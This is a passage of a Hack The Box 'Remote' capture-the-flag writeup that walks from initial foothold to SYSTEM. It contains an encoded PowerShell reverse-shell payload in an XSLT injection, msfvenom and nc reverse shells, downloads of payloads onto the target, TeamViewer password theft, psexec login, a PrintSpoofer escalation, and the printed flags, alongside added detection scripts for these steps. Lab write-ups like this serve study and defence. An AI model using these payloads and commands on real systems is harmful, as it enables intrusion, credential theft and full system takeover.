{ string cmd = "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';

https://sh1yan.top/rt-cmd/

19. Run the exploit and obtain the initial foothold

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 46153.py
Start
[]

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.180] 49707
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>


PS C:\> ls

Directory: C:\

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 7/9/2021 7:41 AM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 3/16/2024 9:34 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 8/17/2021 9:34 AM Windows

PS C:\>

PS C:\> cd Users
PS C:\Users> dir


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 3:12 PM .NET v2.0
d----- 2/19/2020 3:12 PM .NET v2.0 Classic
d----- 2/19/2020 3:12 PM .NET v4.5
d----- 2/19/2020 3:12 PM .NET v4.5 Classic
d----- 7/9/2021 6:50 AM Administrator
d----- 2/19/2020 3:12 PM Classic .NET AppPool
d-r--- 1/9/2024 9:48 AM Public


PS C:\Users> cd Public
PS C:\Users\Public> ls


Directory: C:\Users\Public


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/9/2024 9:48 AM Desktop
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos


PS C:\Users\Public> cd Desktop
PS C:\Users\Public\Desktop>

20. Get the first flag

PS C:\Users\Public\Desktop> ls


Directory: C:\Users\Public\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/20/2020 2:14 AM 1191 TeamViewer 7.lnk
-ar--- 3/16/2024 9:34 AM 34 user.txt


PS C:\Users\Public\Desktop> type user.txt
f33a1e79153d44d09c2dee1b8ab162ee
PS C:\Users\Public\Desktop>

0x02 Obtaining SYSTEM privileges

21. Check the current user and the running processes and services

PS C:\Users\Public\Desktop> whoami
iis apppool\defaultapppool
PS C:\Users\Public\Desktop> tasklist /svc

Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 88 N/A
smss.exe 296 N/A
csrss.exe 372 N/A
wininit.exe 480 N/A
csrss.exe 488 N/A
winlogon.exe 544 N/A
services.exe 616 N/A
lsass.exe 636 KeyIso, SamSs
svchost.exe 736 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
fontdrvhost.exe 756 N/A
fontdrvhost.exe 764 N/A
svchost.exe 844 RpcEptMapper, RpcSs
dwm.exe 924 N/A
svchost.exe 968 DsmSvc, gpsvc, IKEEXT, iphlpsvc, ProfSvc,
Schedule, SENS, ShellHWDetection, Themes,
UserManager, UsoSvc, Winmgmt, wlidsvc,
WpnService
svchost.exe 64 Dhcp, EventLog, lmhosts, TimeBrokerSvc,
WinHttpAutoProxySvc
svchost.exe 332 DsSvc, NcbService, PcaSvc, SysMain, TrkWks,
UALSVC
svchost.exe 364 CoreMessagingRegistrar, DPS
svchost.exe 1096 CDPSvc, EventSystem, FontCache, netprofm,
nsi, SstpSvc
vm3dservice.exe 1104 vm3dservice
svchost.exe 1208 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 1316 Wcmsvc
svchost.exe 1452 BFE, mpssvc
svchost.exe 1688 PolicyAgent
spoolsv.exe 1380 Spooler
svchost.exe 2060 AppHostSvc
svchost.exe 2076 DiagTrack
svchost.exe 2096 ftpsvc
inetinfo.exe 2124 IISADMIN
svchost.exe 2212 W32Time
svchost.exe 2220 W3SVC, WAS
vmtoolsd.exe 2232 VMTools
VGAuthService.exe 2244 VGAuthService
svchost.exe 2260 LanmanServer
TeamViewer_Service.exe 2308 TeamViewer7
MsMpEng.exe 2340 WinDefend
svchost.exe 2372 RasMan
nfssvc.exe 2528 NfsService
dllhost.exe 3128 COMSysApp
WmiPrvSE.exe 3408 N/A
msdtc.exe 3552 MSDTC
LogonUI.exe 4072 N/A
SearchIndexer.exe 1784 WSearch
svchost.exe 1132 StateRepository
svchost.exe 1628 WaaSMedicSvc
w3wp.exe 3452 N/A
win32calc.exe 1704 N/A
win32calc.exe 2916 N/A
win32calc.exe 4808 N/A
cmd.exe 2844 N/A
conhost.exe 1576 N/A
cmd.exe 4172 N/A
conhost.exe 4712 N/A
powershell.exe 5048 N/A
svchost.exe 3808 ClipSVC
tasklist.exe 700 N/A
PS C:\Users\Public\Desktop>

22. TeamViewer7 shows up here; keep looking at the system information

PS C:\Users\Public\Desktop> systeminfo

Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 3/16/2024, 9:33:47 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 813 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,287 MB
Virtual Memory: In Use: 1,144 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4516115
[03]: KB4523204
[04]: KB4464455
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.180
[02]: fe80::29a0:a9bd:5eac:de7b
[03]: dead:beef::29a0:a9bd:5eac:de7b
[04]: dead:beef::24e
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\Public\Desktop>

23. Check the TeamViewer version information to confirm that it is version 7

PS C:\Users\Public\Desktop> 
PS C:\Users\Public\Desktop> (Get-Command "C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe").Version

Major Minor Build Revision
----- ----- ----- --------
7 0 0 0


PS C:\Users\Public\Desktop>

24. There are two approaches here: one is to use msf to load the TeamViewer exploit module directly for privilege escalation, the other is a rotten-potato style attack. We use msf for the escalation, since it is simple and quick

25. Generate a reverse shell executable

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe

26. Download it onto the target machine

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.180 - - [16/Mar/2024 22:41:01] "GET /reverse.exe HTTP/1.1" 200 -


PS C:\Users\Public> cd Downloads
PS C:\Users\Public\Downloads> ls
PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/reverse.exe -Outfile reverse.exe
PS C:\Users\Public\Downloads> dir


Directory: C:\Users\Public\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/16/2024 10:41 AM 7168 reverse.exe


PS C:\Users\Public\Downloads>

27. Start msf

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfconsole
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 0.0.0.0:4444

28. Begin the privilege escalation with msf

msf6 exploit(multi/handler) > 
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (200774 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.180:49714) at 2024-03-16 22:42:34 +0800

msf6 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows IIS APPPOOL\DefaultAppPool @ REMOTE 10.10.14.8:4444 -> 10.10.10.180:49714 (10.10.10.180)

msf6 exploit(multi/handler) >

msf6 exploit(multi/handler) > search TeamViewer

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/teamviewer_uri_smb_redirect normal No TeamViewer Unquoted URI Handler SMB Redirect
1 post/windows/gather/credentials/teamviewer_passwords normal No Windows Gather TeamViewer Passwords


Interact with a module by name or index. For example info 1, use 1 or use post/windows/gather/credentials/teamviewer_passwords

msf6 exploit(multi/handler) > use 1
msf6 post(windows/gather/credentials/teamviewer_passwords) > show options

Module options (post/windows/gather/credentials/teamviewer_passwords):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
WINDOW_TITLE TeamViewer no Specify a title for getting the window handle, e.g. TeamViewer


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/teamviewer_passwords) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/teamviewer_passwords) > run

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/kali/.msf4/loot/20240316224650_default_10.10.10.180_host.teamviewer__314338.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
[*] Post module execution completed
msf6 post(windows/gather/credentials/teamviewer_passwords) >

29. Review the password information obtained in this run

administrator

!R3m0te!

30. Launch psexec and obtain the final flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@10.10.10.180
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file sbEiloUw.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service sCuK on 10.10.10.180.....
[*] Starting service sCuK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:/Users/Administrator

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> type root.txt
ce97750dd34949048b839958825ff45d

C:\Users\Administrator\Desktop>
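The psexec run above leaves a characteristic trace on the target: a randomly named executable uploaded through ADMIN$ and a randomly named service created and started once, which Windows records in the System log as Event ID 7045. The following triage script is an added example, not part of the writeup; the event records it processes are constructed to mirror that run, and the name heuristic is a weak signal that is only meaningful combined with the drop location or start type.

```python
"""Triage Windows System-log 'service installed' records (Event ID 7045) for
PsExec-style remote service execution as seen in the impacket-psexec run above.
Added example; the records below are constructed, not captured from the host."""
import re
from dataclasses import dataclass

# Constructed sample records carrying the EventID 7045 fields that matter.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "sCuK",
     "ImagePath": r"%SystemRoot%\sbEiloUw.exe", "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "StartType": "demand start"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "StartType": ""},
]

LETTERS_ONLY = re.compile(r"^[A-Za-z]{4,8}$")
# Binary placed directly in the Windows root, i.e. what the ADMIN$ share maps to.
ROOT_DROP = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\([^\\]+)\.exe$", re.I)

@dataclass
class Finding:
    service: str
    image: str
    reason: str

def looks_random(name: str) -> bool:
    """Weak signal on its own (legitimate names such as 'Spooler' also match);
    only used together with the drop location or start type below."""
    return bool(LETTERS_ONLY.match(name)) and name != name.lower() and name != name.upper()

def triage(events) -> list[Finding]:
    findings = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        name, image = ev["ServiceName"], ev["ImagePath"]
        reasons = []
        if name.upper() == "PSEXESVC":
            reasons.append("Sysinternals PsExec service name")
        m = ROOT_DROP.match(image)
        if m and looks_random(m.group(1)):
            reasons.append("random-named binary dropped in the Windows root (ADMIN$)")
        if looks_random(name) and ev.get("StartType") == "demand start":
            reasons.append("random service name with demand start")
        if reasons:
            findings.append(Finding(name, image, "; ".join(reasons)))
    return findings
```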

Appendix:

Potato privilege escalation overview:

PS C:\Users\Public\Downloads> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\Public\Downloads>



iwr -uri http://10.10.14.8:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe


┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.180 - - [16/Mar/2024 22:58:45] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -

PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
PS C:\Users\Public\Downloads> dir


Directory: C:\Users\Public\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/16/2024 10:58 AM 27136 PrintSpoofer64.exe
-a---- 3/16/2024 10:41 AM 7168 reverse.exe

PS C:\Users\Public\Downloads> ./PrintSpoofer64.exe -h

PrintSpoofer v0.1 (by @itm4n)

Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)

Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

PS C:\Users\Public\Downloads>



iwr -uri http://10.10.14.8:8000/nc.exe -Outfile nc.exe


PS C:\Users\Public\Downloads> iwr -uri http://10.10.14.8:8000/nc.exe -Outfile nc.exe
PS C:\Users\Public\Downloads> dir


Directory: C:\Users\Public\Downloads


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/16/2024 11:05 AM 68608 nc.exe
-a---- 3/16/2024 10:58 AM 27136 PrintSpoofer64.exe
-a---- 3/16/2024 10:41 AM 7168 reverse.exe

PS C:\Users\Public\Downloads>

./PrintSpoofer64.exe -c "C:\Users\Public\Downloads\nc.exe 10.10.14.8 10086 -e cmd"

C:/Users/Administrator/Desktop/root.txt


PS C:\Users\Public\Downloads> ./PrintSpoofer64.exe -c "C:\Users\Public\Downloads\nc.exe 10.10.14.8 10086 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
PS C:\Users\Public\Downloads>


┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.180] 49728
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D582-9880

Directory of C:\Users\Administrator\Desktop

02/20/2020 03:41 AM <DIR> .
02/20/2020 03:41 AM <DIR> ..
03/16/2024 09:34 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 13,176,942,592 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce97750dd34949048b839958825ff45d

C:\Users\Administrator\Desktop>
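The whoami /priv listing at the top of the appendix is what makes the PrintSpoofer path possible: the application pool token carries SeImpersonatePrivilege. The audit below is an added example, not part of the writeup; it parses that listing (the page's own output, re-typed with the column spacing whoami prints) and reports every token privilege from a hypothetical high-risk set, whether or not it is currently enabled.

```python
"""Audit a 'whoami /priv' listing for token privileges that let a low-privileged
service account (here the IIS application pool) reach SYSTEM through
impersonation abuse such as the PrintSpoofer run in the appendix.  Added
example, not part of the writeup; the sample is the page's own output,
re-typed with the column spacing whoami prints."""
# Presence on the token is what matters: 'Disabled' only means the holder has
# not yet enabled it via AdjustTokenPrivileges, which any process may do.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate to SYSTEM (potato / PrintSpoofer family)",
    "SeAssignPrimaryTokenPrivilege": "start processes under another token",
    "SeDebugPrivilege": "open and tamper with SYSTEM processes",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file, including the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of protected objects",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_privileges(text: str) -> dict[str, str]:
    """Return {privilege name: state}; tolerant of collapsed whitespace."""
    privs, in_table = {}, False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True
            continue
        parts = line.split()
        if in_table and parts and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs

def risky_privileges(text: str) -> list[tuple[str, str, str]]:
    """(name, state, why it matters) for every high-risk privilege held."""
    held = parse_privileges(text)
    return [(n, held[n], HIGH_RISK[n]) for n in HIGH_RISK if n in held]
```

Application pool identities hold SeImpersonatePrivilege by design, so a hit here drives mitigations such as disabling the Print Spooler service on servers that do not print and keeping the host patched, rather than stripping the privilege.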

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/234


Remote-htb-writeup
https://sh1yan.top/2024/03/16/Remote-htb-writeup/
Author
shiyan
Published on
March 16, 2024
License